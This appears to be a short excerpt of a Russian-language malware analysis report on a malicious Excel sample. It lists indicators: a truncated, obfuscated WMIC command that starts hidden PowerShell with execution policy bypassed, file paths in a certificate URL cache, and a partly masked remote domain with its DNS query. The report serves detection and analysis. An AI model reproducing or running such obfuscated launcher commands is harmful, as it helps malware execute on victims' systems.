Техническая информация
- '<SYSTEM32>\wbem\wmic.exe' "ProcESs" "cALL" creaTE "POwerShELl -nOPRofilE -eXeC Bypass -WIndO 00001 -NOnInteracTIV Set ('1N') ([STRING][CHAR]34 ) ;Set ('4F'+'6') ([StrInG][ChAR]44) ; "\"&(${1N}{0}{1}${1N}-f 'sa...
- <Текущая директория>\48ef0000
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- <PATH_SAMPLE>.xls
- 'vi###enar.com':443
- DNS ASK vi###enar.com